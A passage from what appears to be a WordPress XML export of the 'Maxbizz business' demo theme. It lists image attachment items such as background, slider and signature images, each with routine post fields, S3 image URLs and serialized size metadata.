	<path d="M426.867,116.712l5.861-4.688v68.76c0,4.143,3.358,7.5,7.5,7.5s7.5-3.357,7.5-7.5v-68.76l5.861,4.688   c1.383,1.106,3.037,1.644,4.68,1.644c2.2,0,4.38-0.963,5.861-2.814c2.588-3.235,2.063-7.954-1.171-10.542l-18.046-14.437   c-0.019-0.016-0.042-0.025-0.061-0.041c-0.315-0.248-0.648-0.473-1.001-0.668c-0.007-0.003-0.013-0.008-0.02-0.012   c-0.339-0.186-0.696-0.339-1.064-0.472c-0.05-0.018-0.1-0.038-0.15-0.055c-0.347-0.116-0.704-0.207-1.071-0.272   c-0.065-0.011-0.129-0.02-0.193-0.029c-0.368-0.056-0.741-0.093-1.124-0.093s-0.756,0.038-1.124,0.093   c-0.065,0.01-0.129,0.018-0.193,0.029c-0.367,0.065-0.725,0.156-1.071,0.272c-0.051,0.017-0.1,0.037-0.15,0.055   c-0.368,0.132-0.725,0.286-1.064,0.472c-0.007,0.004-0.013,0.009-0.02,0.012c-0.353,0.195-0.686,0.421-1.001,0.668   c-0.02,0.016-0.042,0.025-0.061,0.041l-18.046,14.437c-3.234,2.588-3.759,7.307-1.171,10.542   C418.913,118.774,423.632,119.299,426.867,116.712z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg1-home2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/home/bg1-home2/</link>
		<pubDate>Tue, 20 Oct 2020 09:58:40 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg1-home2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1372</wp:post_id>
		<wp:post_date><![CDATA[2020-10-20 09:58:40]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-20 09:58:40]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg1-home2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg1-home2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/bg1-home2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:660;s:4:"file";s:21:"2020/10/bg1-home2.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:21:"bg1-home2-300x103.jpg";s:5:"width";i:300;s:6:"height";i:103;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"bg1-home2-1024x352.jpg";s:5:"width";i:1024;s:6:"height";i:352;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"bg1-home2-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"bg1-home2-768x264.jpg";s:5:"width";i:768;s:6:"height";i:264;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:22:"bg1-home2-1536x528.jpg";s:5:"width";i:1536;s:6:"height";i:528;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"bg1-home2-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"bg1-home2-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:22:"bg1-home2-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:22:"bg1-home2-1200x660.jpg";s:5:"width";i:1200;s:6:"height";i:660;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg2-home2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/home/bg2-home2/</link>
		<pubDate>Wed, 21 Oct 2020 03:49:49 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg2-home2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1386</wp:post_id>
		<wp:post_date><![CDATA[2020-10-21 03:49:49]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-21 03:49:49]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg2-home2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg2-home2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/bg2-home2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:567;s:4:"file";s:21:"2020/10/bg2-home2.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:20:"bg2-home2-300x89.jpg";s:5:"width";i:300;s:6:"height";i:89;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"bg2-home2-1024x302.jpg";s:5:"width";i:1024;s:6:"height";i:302;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"bg2-home2-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"bg2-home2-768x227.jpg";s:5:"width";i:768;s:6:"height";i:227;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:22:"bg2-home2-1536x454.jpg";s:5:"width";i:1536;s:6:"height";i:454;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"bg2-home2-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"bg2-home2-600x567.jpg";s:5:"width";i:600;s:6:"height";i:567;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:22:"bg2-home2-1200x567.jpg";s:5:"width";i:1200;s:6:"height";i:567;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:22:"bg2-home2-1200x567.jpg";s:5:"width";i:1200;s:6:"height";i:567;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image1-home2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/home/image1-home2/</link>
		<pubDate>Wed, 21 Oct 2020 07:37:28 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image1-home2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1401</wp:post_id>
		<wp:post_date><![CDATA[2020-10-21 07:37:28]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-21 07:37:28]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image1-home2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image1-home2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/image1-home2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:492;s:4:"file";s:24:"2020/10/image1-home2.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:23:"image1-home2-300x77.jpg";s:5:"width";i:300;s:6:"height";i:77;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:25:"image1-home2-1024x262.jpg";s:5:"width";i:1024;s:6:"height";i:262;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"image1-home2-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"image1-home2-768x197.jpg";s:5:"width";i:768;s:6:"height";i:197;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:25:"image1-home2-1536x394.jpg";s:5:"width";i:1536;s:6:"height";i:394;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"image1-home2-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"image1-home2-600x492.jpg";s:5:"width";i:600;s:6:"height";i:492;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:25:"image1-home2-1200x492.jpg";s:5:"width";i:1200;s:6:"height";i:492;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:25:"image1-home2-1200x492.jpg";s:5:"width";i:1200;s:6:"height";i:492;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg3-home2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/home/bg3-home2/</link>
		<pubDate>Wed, 21 Oct 2020 08:04:38 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg3-home2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1406</wp:post_id>
		<wp:post_date><![CDATA[2020-10-21 08:04:38]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-21 08:04:38]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg3-home2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg3-home2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/bg3-home2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:692;s:4:"file";s:21:"2020/10/bg3-home2.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:21:"bg3-home2-300x108.jpg";s:5:"width";i:300;s:6:"height";i:108;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"bg3-home2-1024x369.jpg";s:5:"width";i:1024;s:6:"height";i:369;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"bg3-home2-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"bg3-home2-768x277.jpg";s:5:"width";i:768;s:6:"height";i:277;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:22:"bg3-home2-1536x554.jpg";s:5:"width";i:1536;s:6:"height";i:554;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"bg3-home2-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"bg3-home2-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:22:"bg3-home2-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:22:"bg3-home2-1200x692.jpg";s:5:"width";i:1200;s:6:"height";i:692;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>slider1-home3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/slider1-home3/</link>
		<pubDate>Mon, 02 Nov 2020 08:16:36 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/slider1-home3.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1589</wp:post_id>
		<wp:post_date><![CDATA[2020-11-02 08:16:36]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-02 08:16:36]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[slider1-home3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/slider1-home3.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/slider1-home3.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:770;s:4:"file";s:25:"2020/11/slider1-home3.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:25:"slider1-home3-300x120.jpg";s:5:"width";i:300;s:6:"height";i:120;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:26:"slider1-home3-1024x411.jpg";s:5:"width";i:1024;s:6:"height";i:411;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:25:"slider1-home3-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:25:"slider1-home3-768x308.jpg";s:5:"width";i:768;s:6:"height";i:308;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:26:"slider1-home3-1536x616.jpg";s:5:"width";i:1536;s:6:"height";i:616;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:25:"slider1-home3-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:25:"slider1-home3-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:26:"slider1-home3-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:26:"slider1-home3-1200x770.jpg";s:5:"width";i:1200;s:6:"height";i:770;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>slider2-home3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/slider2-home3/</link>
		<pubDate>Mon, 02 Nov 2020 08:16:39 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/slider2-home3.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1590</wp:post_id>
		<wp:post_date><![CDATA[2020-11-02 08:16:39]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-02 08:16:39]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[slider2-home3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/slider2-home3.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/slider2-home3.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:770;s:4:"file";s:25:"2020/11/slider2-home3.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:25:"slider2-home3-300x120.jpg";s:5:"width";i:300;s:6:"height";i:120;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:26:"slider2-home3-1024x411.jpg";s:5:"width";i:1024;s:6:"height";i:411;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:25:"slider2-home3-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:25:"slider2-home3-768x308.jpg";s:5:"width";i:768;s:6:"height";i:308;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:26:"slider2-home3-1536x616.jpg";s:5:"width";i:1536;s:6:"height";i:616;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:25:"slider2-home3-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:25:"slider2-home3-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:26:"slider2-home3-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:26:"slider2-home3-1200x770.jpg";s:5:"width";i:1200;s:6:"height";i:770;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>slider3-home3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/slider3-home3/</link>
		<pubDate>Mon, 02 Nov 2020 08:16:41 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/slider3-home3.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1591</wp:post_id>
		<wp:post_date><![CDATA[2020-11-02 08:16:41]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-02 08:16:41]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[slider3-home3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/slider3-home3.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/slider3-home3.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:770;s:4:"file";s:25:"2020/11/slider3-home3.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:25:"slider3-home3-300x120.jpg";s:5:"width";i:300;s:6:"height";i:120;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:26:"slider3-home3-1024x411.jpg";s:5:"width";i:1024;s:6:"height";i:411;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:25:"slider3-home3-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:25:"slider3-home3-768x308.jpg";s:5:"width";i:768;s:6:"height";i:308;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:26:"slider3-home3-1536x616.jpg";s:5:"width";i:1536;s:6:"height";i:616;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:25:"slider3-home3-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:25:"slider3-home3-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:26:"slider3-home3-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:26:"slider3-home3-1200x770.jpg";s:5:"width";i:1200;s:6:"height";i:770;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>signature-home3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/home/signature-home3/</link>
		<pubDate>Tue, 03 Nov 2020 09:45:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/signature-home3.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1601</wp:post_id>
		<wp:post_date><![CDATA[2020-11-03 09:45:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-03 09:45:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[signature-home3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/signature-home3.png]]></wp:attachment_url>
											<wp:postmeta>
